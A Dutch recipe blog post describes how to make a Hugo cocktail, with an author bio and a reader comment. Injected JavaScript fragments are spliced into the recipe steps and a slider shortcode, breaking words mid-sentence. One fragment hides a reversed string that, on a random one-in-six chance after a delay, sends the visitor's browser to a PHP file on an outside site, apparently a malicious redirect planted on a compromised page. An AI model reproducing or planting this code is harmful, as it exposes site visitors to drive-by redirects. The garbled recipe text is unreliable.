Hugo zelf maken

Hugo is een heerlijk verfrissend zomerdrankje en gaat mij voorlopig nog niet vervelen. Het is een van de meest geliefde drankjes van Noord- Italië en heeft de afgelopen periode snel terrein gewonnen in Europa. Hugo kun je krijgen bij onder andere Albert Heijn en de Aldi, maar je kunt het ook erg makkelijk zelf maken!

Wat heb je nodig?

– 30 ml vlierbloesemsiroop

– 120 ml prosecco

– 30 ml Spa rood

– 1 schijfje limoen

– Takjes verse munt

– Ijsklontjes

Aan de slag!

Hugo is erg geschikt om in een wijnglas te serveren, maar je kunt natuurlijk ook een vrolijk cocktail glass pakken.

Begin met de vlierbessensiroop, deze kun je onder andere krijgen bij diverse supermarkten, biowinkels en zelfs bij Ikea! Schenk vervolgens de prosecco en de Spa Rood er bij. Voeg als laatst de ijsblokjes dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toe. (Zo makkelijk is het dus…)

Serveertip

Zelf vind ik het altijd leuk om ijsblokjes te maken met munt er in. Dit geeft een leuk effect in het glas en ziet er feestelijk uit. Ook kun kun je tegenwoordig heel veel leuke ijsblokjes vormen krijgen in hartjes, sterretjes en zelfs haaien!

) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tom_links_target=”_self” mode=”horizontal” speed=”5000″ slides_per_view=”4″ audom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toplay=”yes” hide_pagination_control=”” hide_prev_next_butdom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tons=”” partial_view=”yes” wrap=”” img_size=”300×300″]

Anouk - Viving.nl

De website Viving is opgezet door Anouk (28 jaar). In mijn vrije tijd besteed ik veel tijd aan het inrichten van het huis en werk ik graag in de tuin. Daarnaast ben ik dol op lekker eten en drinken. Ik sta dan ook vaak in de keuken om voor familie en vrienden te koken. Als ik in huis bezig ben dan kan ik me heerlijk ontspannen en alle inspiratie die ik hierbij op doe wil ik graag met jullie delen op deze website.

2 Reacties op "Hugo zelf maken"

  • comment-avatar
    Jacklin 2 oktober 2015 (20:36)

    Hier ben ik echt blij mee, afgelopen zomer heerlijk van genoten in Italië.

Plaats een reactie:

Je emailadres wordt niet weergegeven.